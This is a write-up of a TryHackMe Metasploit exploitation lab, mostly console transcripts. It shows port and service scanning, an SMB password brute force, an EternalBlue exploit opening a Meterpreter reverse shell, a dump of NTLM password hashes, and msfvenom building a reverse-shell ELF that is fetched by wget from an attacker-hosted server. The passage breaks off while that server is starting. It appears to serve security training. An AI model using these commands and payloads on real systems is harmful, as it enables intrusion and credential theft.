THM Room https://tryhackme.com/room/metasploitexploitation
TASK 1 : Introduction
Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.
No Answer
TASK 2 : Scanning
How many ports are open on the target system ?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole
[...]
msf5 > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner
msf5 > use 5
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 10.10.33.77: - 10.10.33.77:21 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:22 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:139 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:445 - TCP OPEN
[+] 10.10.33.77: - 10.10.33.77:8000 - TCP OPEN
[*] 10.10.33.77: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We found 5 TCP open ports. Answer : 5
Using the relevant scanner, what NetBIOS name can you see ?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf5 auxiliary(scanner/portscan/tcp) > back
msf5 > search netbios
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/netbios/netbios_spoof normal No NetBIOS Response Brute Force Spoof (Direct)
1 auxiliary/dos/smb/smb_loris 2017-06-29 normal No SMBLoris NBSS Denial of Service
2 auxiliary/scanner/http/ntlm_info_enumeration normal No Host Information Enumeration via NTLM Authentication
3 auxiliary/scanner/netbios/nbname normal No NetBIOS Information Discovery
4 auxiliary/server/netbios_spoof_nat 2016-06-14 normal No NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)
5 auxiliary/server/wpad normal No WPAD.dat File Server
6 auxiliary/spoof/llmnr/llmnr_response normal No LLMNR Spoofer
7 auxiliary/spoof/nbns/nbns_response normal No NetBIOS Name Service Spoofer
Interact with a module by name or index, for example use 7 or use auxiliary/spoof/nbns/nbns_response
msf5 > use 3
msf5 auxiliary(scanner/netbios/nbname) > show options
Module options (auxiliary/scanner/netbios/nbname):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 137 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
msf5 auxiliary(scanner/netbios/nbname) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/netbios/nbname) > run
[*] Sending NetBIOS requests to 10.10.33.77->10.10.33.77 (1 hosts)
[+] 10.10.33.77 [IP-10-10-33-77] OS:Unix Names:(IP-10-10-33-77, __MSBROWSE__, ACME IT SUPPORT) Addresses:(10.10.33.77) Mac:00:00:00:00:00:00
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer : ACME IT SUPPORT
What is running on port 8000 ?
For answering this question, i ran nmap to have the service running on port 8000 then use module scanner/http_version :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
msf5 auxiliary(scanner/netbios/nbname) > back
msf5 > nmap -sS 10.10.33.77
[*] exec: nmap -sS 10.10.33.77
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 08:39 BST
Nmap scan report for ip-10-10-33-77.eu-west-1.compute.internal (10.10.33.77)
Host is up (0.0014s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8000/tcp open http-alt
MAC Address: 02:E9:BA:38:47:59 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds
msf5 > search http_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/http_version normal No HTTP Version Detection
msf5 > use 0
msf5 auxiliary(scanner/http/http_version) > show options
Module options (auxiliary/scanner/http/http_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/http_version) > setg RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/http/http_version) > set RPORT 8000
RPORT => 8000
msf5 auxiliary(scanner/http/http_version) > run
[+] 10.10.33.77:8000 webfs/1.21 ( 403-Forbidden )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer : webfs/1.21
What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
msf5 auxiliary(scanner/http/http_version) > back
msf5 > search scanner/smb
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
1 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
2 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
3 auxiliary/scanner/smb/pipe_auditor normal No SMB Session Pipe Auditor
4 auxiliary/scanner/smb/pipe_dcerpc_auditor normal No SMB Session Pipe DCERPC Auditor
5 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
6 auxiliary/scanner/smb/smb1 normal No SMBv1 Protocol Detection
7 auxiliary/scanner/smb/smb2 normal No SMB 2.0 Protocol Detection
8 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration
9 auxiliary/scanner/smb/smb_enumshares normal No SMB Share Enumeration
10 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)
11 auxiliary/scanner/smb/smb_enumusers_domain normal No SMB Domain User Enumeration
12 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
13 auxiliary/scanner/smb/smb_lookupsid normal No SMB SID User Enumeration (LookupSid)
14 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
15 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
16 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index, for example use 16 or use auxiliary/scanner/smb/smb_version
msf5 > use 12
msf5 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.33.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser penny
SMBUser => penny
msf5 auxiliary(scanner/smb/smb_login) > ls
[*] exec: ls
MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > set DB_ALL_PASS true
DB_ALL_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE MetasploitWordlist.txt
PASS_FILE => MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.33.77:445 - 10.10.33.77:445 - Starting SMB login bruteforce
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:95',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:98',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:2003',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:2008',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:111111',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:123456',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:12345678',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:1qaz2wsx',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:abc',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:abc123',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:abcd123',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:account',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:admin',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:adminadmin',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:administator',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:admins',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:air',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:alpine',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2013',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2013',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2014',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2014',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2015',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2015',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2016',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2016',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:Autumn2017',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:autumn2017',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:bankbank',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:baseball',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:basketball',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:bird',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:burp',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:change',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:changelater',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:changeme',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company!',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company1',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company1!',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:company123',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex1',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex2',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complex3',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:complexpassword',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:database',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:default',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:dev',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:devdev',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:devdevdev',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:dirt',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:dragon',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:earth',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:fire',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:football',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:god',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:guessme',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:hugs',
[-] 10.10.33.77:445 - 10.10.33.77:445 - Failed: '.\penny:letmein',
[+] 10.10.33.77:445 - 10.10.33.77:445 - Success: '.\penny:leo1234'
[*] 10.10.33.77:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer : leo1234
TASK 3 : The Metasploit Database
No answers needed.
No Anwser
TASK 4 : Vulnerability Scanning
Who wrote the module that allows us to check SMTP servers for open relay ?
Let’s again search keywords like SMTP, smtp_server, relay. The last one give me what i want :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
msf5 > search relay
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/mssql/mssql_ntlm_stealer normal No Microsoft SQL Server NTLM Stealer
1 auxiliary/admin/mssql/mssql_ntlm_stealer_sqli normal No Microsoft SQL Server SQLi NTLM Stealer
2 auxiliary/admin/oracle/ora_ntlm_stealer 2009-04-07 normal No Oracle SMB Relay Code Execution
3 auxiliary/gather/ibm_bigfix_sites_packages_enum 2019-03-18 normal No IBM BigFix Relay Server Sites and Package Enum
4 auxiliary/scanner/http/exchange_web_server_pushsubscription 2019-01-21 normal No Microsoft Exchange Privilege Escalation Exploit
5 auxiliary/scanner/sap/sap_smb_relay normal No SAP SMB Relay Abuse
6 auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence normal No SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
7 auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir normal No SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
8 auxiliary/scanner/smtp/smtp_relay normal No SMTP Open Relay Detection
9 auxiliary/server/http_ntlmrelay normal No HTTP Client MS Credential Relayer
10 auxiliary/server/socks4a normal No Socks4a Proxy Server
11 auxiliary/server/socks5 normal No Socks5 Proxy Server
12 exploit/multi/http/october_upload_bypass_exec 2017-04-25 excellent Yes October CMS Upload Protection Bypass Code Execution
13 exploit/multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE
14 exploit/windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free
15 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
16 post/multi/manage/screenshare normal No Multi Manage the screen of the target meterpreter session
Interact with a module by name or index, for example use 16 or use post/multi/manage/screenshare
msf5 > use 8
msf5 auxiliary(scanner/smtp/smtp_relay) > info
Name: SMTP Open Relay Detection
Module: auxiliary/scanner/smtp/smtp_relay
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Campbell Murray
xistence <xistence@0x90.nl>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXTENDED false yes Do all the 16 extended checks
MAILFROM sender@example.com yes FROM address of the e-mail
MAILTO target@example.com yes TO address of the e-mail
RHOSTS 10.10.33.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module tests if an SMTP server will accept (via a code 250) an
e-mail by using a variation of testing methods. Some of the extended
methods will try to abuse configuration or mailserver flaws.
References:
http://www.ietf.org/rfc/rfc2821.txt
https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse
Answer : Campbell Murray
TASK 5 : Exploitation
Exploit one of the critical vulnerabilities on the target VM.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
msf5 > setg RHOSTS 10.10.215.124
RHOSTS => 10.10.215.124
msf5 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use 2
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.196.135:4444
[*] 10.10.215.124:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.215.124:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.215.124:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.215.124:445 - Connecting to target for exploitation.
[+] 10.10.215.124:445 - Connection established for exploitation.
[+] 10.10.215.124:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.215.124:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.215.124:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.215.124:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.215.124:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.215.124:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.215.124:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.215.124:445 - Sending all but last fragment of exploit packet
[*] 10.10.215.124:445 - Starting non-paged pool grooming
[+] 10.10.215.124:445 - Sending SMBv2 buffers
[+] 10.10.215.124:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.215.124:445 - Sending final SMBv2 buffers.
[*] 10.10.215.124:445 - Sending last fragment of exploit packet!
[*] 10.10.215.124:445 - Receiving response from exploit packet
[+] 10.10.215.124:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.215.124:445 - Sending egg to corrupted connection.
[*] 10.10.215.124:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.215.124
[*] Meterpreter session 2 opened (10.10.196.135:4444 -> 10.10.215.124:49189) at 2021-09-26 09:39:36 +0100
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
No Answer
What is the content of the flag.txt file ?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
meterpreter > shell
C:\Windows\system32>cd /Users
cd /Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users
12/12/2018 10:13 PM <DIR> .
12/12/2018 10:13 PM <DIR> ..
12/12/2018 10:13 PM <DIR> Jon
04/12/2011 03:28 AM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 39,938,625,536 bytes free
C:\Users>cd Jon/Desktop
cd Jon
C:\Users\Jon\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Desktop
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 39,938,625,536 bytes free
C:\Users\Jon\Desktop>cd ..
cd ..
C:\Users\Jon>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon
12/12/2018 10:13 PM <DIR> .
12/12/2018 10:13 PM <DIR> ..
12/12/2018 10:13 PM <DIR> Contacts
12/12/2018 10:49 PM <DIR> Desktop
07/14/2021 09:39 PM <DIR> Documents
12/12/2018 10:13 PM <DIR> Downloads
12/12/2018 10:13 PM <DIR> Favorites
12/12/2018 10:13 PM <DIR> Links
12/12/2018 10:13 PM <DIR> Music
12/12/2018 10:13 PM <DIR> Pictures
12/12/2018 10:13 PM <DIR> Saved Games
12/12/2018 10:13 PM <DIR> Searches
12/12/2018 10:13 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 39,938,625,536 bytes free
C:\Users\Jon>cd Documents
cd Documents
C:\Users\Jon\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
07/14/2021 09:39 PM <DIR> .
07/14/2021 09:39 PM <DIR> ..
07/14/2021 09:39 PM 15 flag.txt
1 File(s) 15 bytes
2 Dir(s) 39,938,625,536 bytes free
C:\Users\Jon\Documents>type flag.txt
type flag.txt
THM-5455554845
You can also try the search command in the meterpreter :
1
2
3
4
meterpreter > search -f "flag.txt"
Found 1 result...
c:\Users\Jon\Documents\flag.txt (15 bytes)
Answer : THM-5455554845
What is the NTLM hash of the password of the user “pirate”?
We need to dump the hash of a user. For this, i’ll background my meterpreter session then search for a hashdump with metasploit :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
C:\Windows\system32>exit
exit
meterpreter >
Background session 2? [y/N]
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.196.135:4444 -> 10.10.215.124:49189 (10.10.215.124)
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > search hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
1 auxiliary/scanner/mssql/mssql_hashdump normal No MSSQL Password Hashdump
2 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump
3 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
4 auxiliary/scanner/oracle/oracle_hashdump normal No Oracle Password Hashdump
5 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
6 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
7 post/aix/hashdump normal No AIX Gather Dump Password Hashes
8 post/android/gather/hashdump normal No Android Gather Dump Password Hashes for Android Systems
9 post/bsd/gather/hashdump normal No BSD Dump Password Hashes
10 post/linux/gather/hashdump normal No Linux Gather Dump Password Hashes for Linux Systems
11 post/osx/gather/hashdump normal No OS X Gather Mac OS X Password Hash Collector
12 post/solaris/gather/hashdump normal No Solaris Gather Dump Password Hashes for Solaris Systems
13 post/windows/gather/credentials/domain_hashdump normal No Windows Domain Controller Hashdump
14 post/windows/gather/credentials/mcafee_vse_hashdump normal No McAfee Virus Scan Enterprise Password Hashes Dump
15 post/windows/gather/credentials/mssql_local_hashdump normal No Windows Gather Local SQL Server Hash Dump
16 post/windows/gather/hashdump normal No Windows Gather Local User Account Password Hashes (Registry)
17 post/windows/gather/smart_hashdump normal No Windows Gather Local and Domain Controller Account Password Hashes
Interact with a module by name or index, for example use 17 or use post/windows/gather/smart_hashdump
msf5 > use 16
msf5 post(windows/gather/hashdump) > show options
Module options (post/windows/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/hashdump) > set SESSION 2
SESSION => 2
msf5 post(windows/gather/hashdump) > show options
Module options (post/windows/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on.
msf5 post(windows/gather/hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
[*] Post module execution completed
Answer : 8ce9a3ebd1647fcc5e04025019f4b875
TASK 6 : Msfvenom
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell, this will make things easier.
No Answer
Create a meterpreter payload in the .elf format.
1
2
3
4
5
6
root@ip-10-10-196-135:~/Desktop/msexploit# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.196.135 LPORT=7777 --platform linux -f elf -o shell.elf
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf
The first payload i created doesn’t work so i use a venom-builder https://pentest.ws/tools/venom-builder to have the exact syntax to use like above and the msfconsole launch command.
No Answer
ransfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).
On Kali machine :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@ip-10-10-196-135:~/Desktop/msexploit# nano pyserver.py
import http.server
import socketserver
PORT = 7000
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", PORT), Handler) as http:
print("serving at port", PORT)
http.serve_forever()
root@ip-10-10-196-135:~/Desktop/msexploit# python3 pyserver.py
serving at port 9000
